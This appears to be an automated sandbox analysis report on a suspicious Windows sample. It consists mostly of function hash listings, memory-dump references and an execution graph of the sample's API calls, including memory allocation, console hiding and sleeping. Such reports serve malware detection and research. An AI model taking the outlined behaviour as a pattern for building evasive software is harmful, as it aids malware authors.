                                                                                                                                                                                      • Opcode ID: 3642dd56eb2e60925120520e809d286eec298142434a6114f5b910413856bc7d
                                                                                                                                                                                      • Instruction ID: 5341b6ed0e1c0c7cb614374b2800813b69baee787645cef154dc485a4781f9f9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3642dd56eb2e60925120520e809d286eec298142434a6114f5b910413856bc7d
                                                                                                                                                                                      • Instruction Fuzzy Hash: B4E086729483546F870EDEB854124EE7FA59E92230B0241EFC14ACB571DBB80E4587E1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707A878 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 076a09876f84237ee931d0e5c13f92017d83376ddc5ea856dbadc8f15c2818dd
                                                                                                                                                                                      • Instruction ID: f5acff072df59937a02272e2199bb163b48032a55eccf3bc1ba3d59c00210305
                                                                                                                                                                                      • Opcode Fuzzy Hash: 076a09876f84237ee931d0e5c13f92017d83376ddc5ea856dbadc8f15c2818dd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 17E0D834A402108FC714DB78E40A5D97FF4AF4121130140EBE406DB572C730CC01CB92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 070710A7 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 59356e7eaeff9d9495271a40596f73eab1706dea441ee252a5a82e694ad5320f
                                                                                                                                                                                      • Instruction ID: 2d1d456a96ae3e91bd125a13ed2d9f4cc2975da28546ab8939c5c90e81947593
                                                                                                                                                                                      • Opcode Fuzzy Hash: 59356e7eaeff9d9495271a40596f73eab1706dea441ee252a5a82e694ad5320f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EE0D831B046908FCB099BB494549E93BA19F4911D31944FED449CB7A1CF31CC01CBA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707DB89 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: e0550138e1cb5580f34668ea734cc479c7c37ee4a63154e93a3e1f15166a69bc
                                                                                                                                                                                      • Instruction ID: 2d90ace0eac37b61051ffdc4b272abda10b2bea616cc1d4172548f5036ede079
                                                                                                                                                                                      • Opcode Fuzzy Hash: e0550138e1cb5580f34668ea734cc479c7c37ee4a63154e93a3e1f15166a69bc
                                                                                                                                                                                      • Instruction Fuzzy Hash: B0F0F2B0D1420A9F8F94EFA9D4061AEBFF0EF19311F2081AAE829E7210E2750651CF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 07070459 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 2b716d1d16c23585d25a8a18342ba71f443d5ab38c49ca136d1be745d8128cbf
                                                                                                                                                                                      • Instruction ID: 32c98eb1145a65d8f9b9f0265ca4b8cd08be53bc301bde1e8fa53441c6b9aa1f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b716d1d16c23585d25a8a18342ba71f443d5ab38c49ca136d1be745d8128cbf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BE0DF3090A38CAFCB00CF74DD164CDBFB6EB42108B4248DEE809E7202DA302E08AB45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 070764A0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 79ff25466acc4c24b4624958a7888f38b86cf341f61bfa194d3b0b5938da39c7
                                                                                                                                                                                      • Instruction ID: 0b3c343e92ca09ca0bceac1f33970125f191e1c83652659adb8bf0dc1779918d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 79ff25466acc4c24b4624958a7888f38b86cf341f61bfa194d3b0b5938da39c7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 74E0DF352052A1CFCB51EB28F8145C837E1FB86311B0849AED28ACB586C7B91C8AC7C2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 07077610 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: b2461e40fb9a8f4c6e0b01c0bd707854e0bb60fcccef5551953124ce7f3f69df
                                                                                                                                                                                      • Instruction ID: 6668d21af0bd629a3c9fdf319bcc206da94dd4008aec9de8b5e3a3df857a51c8
                                                                                                                                                                                      • Opcode Fuzzy Hash: b2461e40fb9a8f4c6e0b01c0bd707854e0bb60fcccef5551953124ce7f3f69df
                                                                                                                                                                                      • Instruction Fuzzy Hash: 52E0CD357067514FC715777994200D57BA5DF4A160305C867D509CF581DB344805C7D1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 070710B8 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 8f22babd155a93054b2316f58bee12eba95760306800b4aa64392c418c5bb582
                                                                                                                                                                                      • Instruction ID: ba9739d9409e3b1372318ea2e689de4d1f0c5d9d4b70547653ed31a247bc4fa4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f22babd155a93054b2316f58bee12eba95760306800b4aa64392c418c5bb582
                                                                                                                                                                                      • Instruction Fuzzy Hash: 80E01231B006148FCB58E7799454CA973DAEF8955931544BDE405DBB60DF75DC0187D0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 07074E68 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 140ae68f8838e15d500f68c56573f8f8e6ade2571ab88b0576198a68a725baa7
                                                                                                                                                                                      • Instruction ID: a1f84eef64ec93dfbcfa2610de55c8f0987d66fc80bb2dd462f67ddc295fc1ce
                                                                                                                                                                                      • Opcode Fuzzy Hash: 140ae68f8838e15d500f68c56573f8f8e6ade2571ab88b0576198a68a725baa7
                                                                                                                                                                                      • Instruction Fuzzy Hash: CAE020341051A59FC715DF24F8445D837E1FB45115B15415DE040CB2B2D7780C8ACBC1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 070733D0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: f59075a5bc2d2c285dbb5f1945d261ebcb950d08348671b2584e39cc2beb942b
                                                                                                                                                                                      • Instruction ID: 49f84aa75de2e2d51bd6303d2055d8b6806aefcb3550929ca280cd00a67b9c7e
                                                                                                                                                                                      • Opcode Fuzzy Hash: f59075a5bc2d2c285dbb5f1945d261ebcb950d08348671b2584e39cc2beb942b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FD05B353075546B8A28E76BB4184AD779AEFC5621308046DE30BC7641CF711C0957D7
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707DB98 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 237d28c01b140f500144d948797fd2921ae289434f4c9a054fb266bafd0e1a24
                                                                                                                                                                                      • Instruction ID: 284392c5bd234e7d1202d0db0a83226fc75a010f611be8d283db71a6497e640a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 237d28c01b140f500144d948797fd2921ae289434f4c9a054fb266bafd0e1a24
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CE092B5D0420D9F8B84EFA9D4465BEBFF4AB58200F10816AE928E2240E7345A51CFD5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707BA88 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 74a397590d542d6980521264d226ab6fdad9fa98b29d2c9afe26cbfe56fd4798
                                                                                                                                                                                      • Instruction ID: 2be7e2ef1887663b9bcc359dcf5eb2a99191968645a026676a964c003429f5b0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 74a397590d542d6980521264d226ab6fdad9fa98b29d2c9afe26cbfe56fd4798
                                                                                                                                                                                      • Instruction Fuzzy Hash: 54E0DF34A0A2849FDB56EF3AE8156097BE1FF45300F54849AC051CB253CB789D04CF52
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 07070468 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d07f2486cf41d76c3d1a104f1d23e2c171c32823b251d4ea7a20f8cc0ba4108a
                                                                                                                                                                                      • Instruction ID: cd8ca9c4a8837346f4a1df38f5231ac45faeff446603baec94b5ee3bbbf0a5b7
                                                                                                                                                                                      • Opcode Fuzzy Hash: d07f2486cf41d76c3d1a104f1d23e2c171c32823b251d4ea7a20f8cc0ba4108a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BD05B70E0120CEF8B44DFA4DA455DDBBF5EB45508751449DD409D3300DB311F009B45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707AA60 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ec6c0c3fea6077ca262f6f7e362d559e9f36005f5efd9d2a091c0d6ac7ec564d
                                                                                                                                                                                      • Instruction ID: 6c73b1e416044a6e2e83603587645716bab8d6e7aa6cd051f3ab5ea28f8b29db
                                                                                                                                                                                      • Opcode Fuzzy Hash: ec6c0c3fea6077ca262f6f7e362d559e9f36005f5efd9d2a091c0d6ac7ec564d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD022326083286B0708DEF858514DF7F9DCAE0174F02406BC50DC7240EE781E0002D5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707AA30 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: bca1af316351a48d9e1ea42b14e11b67565b8f7da5b9ef662603f5a297d8470d
                                                                                                                                                                                      • Instruction ID: 2eb93cfbb07690024704eec34ee3be3d7dac4327d201da49da926b573a4e95eb
                                                                                                                                                                                      • Opcode Fuzzy Hash: bca1af316351a48d9e1ea42b14e11b67565b8f7da5b9ef662603f5a297d8470d
                                                                                                                                                                                      • Instruction Fuzzy Hash: F2C0123414C3D04FCB06672454590DA3FA25D8321170A84DAD0C68E072D6144444C752
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 07070440 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 4c17ccec3b0fc0af6a3dc4d74b593568f2444d79f98e5912c8745979c2e412c0
                                                                                                                                                                                      • Instruction ID: 8470097b56e3ce879c4385451d6f3f22b311ff2e26599f32aa8bcba3fdae4e43
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c17ccec3b0fc0af6a3dc4d74b593568f2444d79f98e5912c8745979c2e412c0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 89B012B2C3080CA7ED450740CC0F3D53750E341203F8C0B009400C4200D5206105D00E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                      Function 07075260 Relevance: 8.9, Strings: 7, Instructions: 103COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: `|]$`|]$`|]$`|]$`|]$`|]$`|]
                                                                                                                                                                                      • API String ID: 0-1201461387
                                                                                                                                                                                      • Opcode ID: 325ba2e8c14482bcee27ba2ede83f3a6115b1bbfae4194cf4d4d4f64cbc4414f
                                                                                                                                                                                      • Instruction ID: c4c46d754bc6c8b9339b508fa96f00b70db656786ea5f2fec6f9c1095c3ffddc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 325ba2e8c14482bcee27ba2ede83f3a6115b1bbfae4194cf4d4d4f64cbc4414f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D41FAB0D02289DFCB54EFA5E89899DB7B6FF48204B10891AE516F3350DB705948CF62
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707BDCF Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: $%]l$$%]l$S>Tf^$c>Tf^
                                                                                                                                                                                      • API String ID: 0-1056830202
                                                                                                                                                                                      • Opcode ID: a5acd9534d39e6020bdef7b581f5da2a1ddec11376c6da285435c472fd2fde4a
                                                                                                                                                                                      • Instruction ID: b7182eac3a50c7261bd7271046d154501b4e3dc6da24a081439ed4dd01b5dcab
                                                                                                                                                                                      • Opcode Fuzzy Hash: a5acd9534d39e6020bdef7b581f5da2a1ddec11376c6da285435c472fd2fde4a
                                                                                                                                                                                      • Instruction Fuzzy Hash: BB31B1B57046419FC3059F39C49496EFBE2EF8621431985AAD00ACFB62DF35EC05CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707BDE0 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: $%]l$$%]l$S>Tf^$c>Tf^
                                                                                                                                                                                      • API String ID: 0-1056830202
                                                                                                                                                                                      • Opcode ID: a13eb0a2438497c24fc4a47976e007154020e2571d937329e984a766d21506b0
                                                                                                                                                                                      • Instruction ID: 4f2ce772de9a1afca0bb778e9ffe585173b56be97a4967f74eeaadf5886f8c42
                                                                                                                                                                                      • Opcode Fuzzy Hash: a13eb0a2438497c24fc4a47976e007154020e2571d937329e984a766d21506b0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 45218DB57006419FC3159F39C49496EFBE2EF862143198A6ED00ACBB62DF35EC05CB81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:9.9%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                      Total number of Nodes:394
                                                                                                                                                                                      Total number of Limit Nodes:19
                                                                                                                                                                                      execution_graph 40562 401340 GetModuleHandleA 40563 40135f LoadLibraryA GetProcAddress GetProcAddress 40562->40563 40564 4013a2 40562->40564 40563->40564 40565 4013c0 GetModuleHandleA 40564->40565 40566 4013fa atexit 40564->40566 40567 4013d8 GetProcAddress 40565->40567 40568 4013ed 40565->40568 40567->40568 40568->40566 40569 4012e0 __set_app_type 40574 4011b0 40569->40574 40575 4011c0 40574->40575 40576 4011dc SetUnhandledExceptionFilter 40574->40576 40575->40576 40577 4011f0 40576->40577 40589 4243f0 40577->40589 40581 401202 40582 40120b _setmode _setmode _setmode 40581->40582 40583 40124d __p__fmode 40581->40583 40582->40583 40584 40125f 40583->40584 40604 41f970 40584->40604 40586 401267 __p__environ 40608 4b046c 40586->40608 40588 401288 _cexit ExitProcess 40591 424404 40589->40591 40592 4011fd 40589->40592 40590 42444d _fpreset 40590->40592 40591->40590 40591->40592 40593 41f440 40592->40593 40594 41f456 GetCommandLineA strlen 40593->40594 40599 41f736 40593->40599 40600 41f477 40594->40600 40596 41f745 40596->40581 40597 41f55f 40597->40581 40598 428750 54 API calls 40598->40599 40649 4012a0 __getmainargs 40599->40649 40600->40597 40600->40600 40601 41f620 _isctype 40600->40601 40602 41f52c 40600->40602 40637 428750 40600->40637 40601->40600 40602->40597 40602->40598 40605 41f979 40604->40605 40607 41f920 atexit 40604->40607 40605->40586 40607->40586 40609 41f970 atexit 40608->40609 40610 4b0488 40609->40610 40722 41031b 40610->40722 40613 4b049f VirtualAlloc 40622 4b04c6 40613->40622 40614 4b38a0 VirtualAlloc 40616 4b38cf VirtualAlloc 40614->40616 40617 4b391e 40614->40617 40615 4b38f5 40615->40617 40618 4b38fa MessageBoxW 40615->40618 40616->40617 40731 4154a6 40617->40731 40618->40617 40620 4b3929 40621 4b3931 GetPEB 40620->40621 40624 4b393d FreeConsole GetPEB 40621->40624 40622->40614 40622->40615 40625 4b3a11 Sleep 40624->40625 40780 415e37 40625->40780 40630 4b3b97 40791 49e610 strlen 40630->40791 40634 4b3d08 40820 41592f 40634->40820 40636 4b3d4e 40636->40588 40638 428766 40637->40638 40639 428783 40638->40639 40640 428776 40638->40640 40650 427ec0 40639->40650 40695 4278c0 malloc 40640->40695 40643 42877d 40643->40639 40644 428792 40645 428799 40644->40645 40646 4287b5 strlen 40644->40646 40645->40600 40647 4287d1 40646->40647 40648 428808 _strdup 40647->40648 40648->40645 40649->40596 40651 428230 strlen 40650->40651 40652 427eda strlen 40650->40652 40659 428249 40651->40659 40653 41ffc0 40652->40653 40654 427ef6 memcpy 40653->40654 40696 4288a0 setlocale 40654->40696 40656 427f14 40720 4278c0 malloc 40656->40720 40658 428216 40658->40644 40671 427ec0 30 API calls 40659->40671 40660 427f28 40660->40658 40661 427f47 40660->40661 40662 42841e strlen 40660->40662 40663 427ec0 30 API calls 40661->40663 40667 428439 40662->40667 40664 427f5c 40663->40664 40664->40658 40665 427f72 40664->40665 40666 427f8b strlen 40664->40666 40665->40666 40672 428496 40665->40672 40669 42847f 40666->40669 40690 427fa0 40666->40690 40668 42846d _strdup 40667->40668 40668->40658 40668->40669 40669->40659 40670 427fb4 40670->40644 40671->40659 40674 42868f strlen 40672->40674 40672->40690 40673 42855a free 40673->40658 40681 4286a7 40674->40681 40675 428645 malloc 40675->40690 40676 428066 strlen 40684 428090 40676->40684 40677 42851d free 40678 428536 40677->40678 40685 42854d 40677->40685 40682 42853c free 40678->40682 40679 428611 _errno 40679->40690 40680 4284cd free 40680->40685 40680->40690 40683 4286ce _strdup 40681->40683 40682->40682 40682->40685 40683->40685 40684->40690 40715 429030 40684->40715 40685->40673 40688 428570 memcpy 40688->40690 40689 4280f4 memcpy strlen 40689->40690 40690->40670 40690->40673 40690->40675 40690->40676 40690->40677 40690->40678 40690->40679 40690->40680 40690->40684 40690->40688 40690->40689 40691 428159 _strdup 40690->40691 40692 4281a3 strcoll 40690->40692 40693 4281c5 _stricoll 40690->40693 40694 4281d9 malloc 40690->40694 40721 427bf0 8 API calls 40690->40721 40691->40690 40692->40690 40693->40690 40694->40690 40695->40643 40697 4288c3 _strdup 40696->40697 40698 4288cd setlocale 40696->40698 40697->40698 40699 4288f0 wcstombs realloc wcstombs setlocale free 40698->40699 40700 4288e8 40698->40700 40699->40656 40700->40699 40701 428961 mbstowcs 40700->40701 40702 41ffc0 40701->40702 40703 428990 mbstowcs 40702->40703 40704 4289d5 40703->40704 40705 4289c1 40703->40705 40706 428ace 40704->40706 40709 4289ed 40704->40709 40705->40704 40707 428c00 setlocale free 40705->40707 40706->40699 40708 428ba8 40707->40708 40708->40656 40710 428a6b wcstombs realloc wcstombs 40709->40710 40712 428ae0 wcstombs 40709->40712 40711 428b90 setlocale free 40710->40711 40711->40708 40712->40711 40714 428b8c 40712->40714 40714->40711 40716 429060 _errno 40715->40716 40717 42903c FindClose 40715->40717 40719 42905b 40716->40719 40717->40716 40718 429051 free 40717->40718 40718->40719 40719->40690 40720->40660 40721->40690 40824 40b683 40722->40824 40725 41033e VirtualAlloc 40726 410365 40725->40726 40727 41209d VirtualAlloc 40726->40727 40728 4120c4 40726->40728 40727->40728 40729 4131d6 VirtualAlloc 40728->40729 40730 4131fd 40728->40730 40729->40730 40730->40613 40730->40622 40732 40146e 53 API calls 40731->40732 40733 4154d9 40732->40733 40734 40146e 53 API calls 40733->40734 40735 4154ee 40734->40735 40856 415172 40735->40856 40737 41551b 40738 40146e 53 API calls 40737->40738 40739 41553e 40738->40739 40740 40146e 53 API calls 40739->40740 40741 41555c 40740->40741 40742 40146e 53 API calls 40741->40742 40743 41556c 40742->40743 40744 40146e 53 API calls 40743->40744 40745 415594 40744->40745 40865 415252 40745->40865 40747 4155d3 40748 40146e 53 API calls 40747->40748 40749 4155f1 40748->40749 40750 40146e 53 API calls 40749->40750 40751 415604 40750->40751 40752 40146e 53 API calls 40751->40752 40753 415617 40752->40753 40754 40146e 53 API calls 40753->40754 40755 41564b 40754->40755 40876 41534c 40755->40876 40757 4156bb 40758 40146e 53 API calls 40757->40758 40759 4156d8 40758->40759 40760 40146e 53 API calls 40759->40760 40761 4156f5 40760->40761 40891 41504e 40761->40891 40763 415700 40764 40146e 53 API calls 40763->40764 40765 41571c 40764->40765 40766 40146e 53 API calls 40765->40766 40767 41573a 40766->40767 